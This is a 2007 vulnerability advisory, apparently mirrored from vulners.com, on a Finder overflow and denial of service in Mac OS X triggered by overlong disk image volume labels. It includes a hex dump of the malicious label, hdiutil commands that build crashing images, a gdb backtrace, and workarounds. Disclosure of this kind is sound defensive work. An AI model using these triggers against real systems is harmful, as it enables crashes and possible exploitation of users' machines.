DMA[2007-0109a] - 'Apple Finder Disk Image Volume Label Overflow / DoS'

2007-01-1100:00:00

vulners.com

DMA[2007-0109a] - 'Apple Finder Disk Image Volume Label Overflow / DoS'
Author: Kevin Finisterre
Vendor(s): http://www.apple.com
Product: '<= OSX 10.4 (?)'
References:
http://www.digitalmunition.com/DMA[2007-0109a].txt
http://www.apple.com/macosx/features/finder/
http://projects.info-pull.com/moab/MOAB-09-01-2007.html

Description:
Your home on the Mac, Finder gives you lots of options for locating, displaying and organizing all your
files and folders. From the power of Spotlight search technology to the flexibility of customizable item
views, Mac OS X Finder truly shows your Mac at a glance.

You can really piss Finder off in several ways by passing long volume labels to various types of disk
images. Here is the hex dump of an example label that can be used to trigger the issue.

0009c00: 4c41 424c be42 0000 0000 0001 4594 86e1 LABL.B…E…
0009c10: 00ff 4141 4141 4141 4141 4141 4141 4141 …AAAAAAAAAAAAAA
0009c20: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c30: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c40: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c50: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c60: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c70: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c80: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c90: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009ca0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cb0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cc0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cd0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009ce0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cf0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009d00: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009d10: 4100 0000 0000 0000 0000 0000 0000 0000 A…

Creating the images is something fairly easy to do.
$ hdiutil create -sectors 31337 -type SPARSE -fs HFS+ -volname `perl -e 'print "A" x 255'` -layout NONE test.sparseimage

$ hdiutil create test.dmg -size 01m -fs HFS+ -volname `perl -e 'print "A" x 255'`

$ hdiutil create test.dmg -size 200k -fs UFS -volname `perl -e 'print "A" x 255'`

Attach gdb to Finder and open any of the above .dmg files and you will see the following crash.

(gdb) bt
#0 0xffff0ac4 in ___memcpy () at /System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h:228
#1 0x90c93952 in _FSCopyExtendedAliasInfoFromAliasPtr ()
#2 0x9252939d in TNode::CreateVirtualAliasRecord ()
#3 0x92528872 in TNode::PopulateVirtualContainerFromSFL ()
#4 0x92513343 in TNodeSyncTask::SyncTaskProc ()
#5 0x90cb3f84 in PrivateMPEntryPoint ()
#6 0x90023d87 in _pthread_body ()

See Alastairs blog (http://alastairs-place.net) in about 3 days for an explaination of exploitability.

Workaround:
Do not mount disk images or simply disable finder and use Spotlight instead.

Open Terminal, found in /Applications -> Utilities, and then type
'sudo mv /System/Library/CoreServices/Finder.app /Applications/'
Still in Terminal, type killall Finder – this kills the process named Finder, and it should not restart! Note that this
does not affect the Dock or Expos

The following command will unmount a disk image in the event that your Finder has been put into a DoS condition.
$ hdiutil unmount /Volumes/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/

JSON

DMA[2007-0109a] - &#39;Apple Finder Disk Image Volume Label Overflow / DoS&#39;

DMA[2007-0109a] - 'Apple Finder Disk Image Volume Label Overflow / DoS'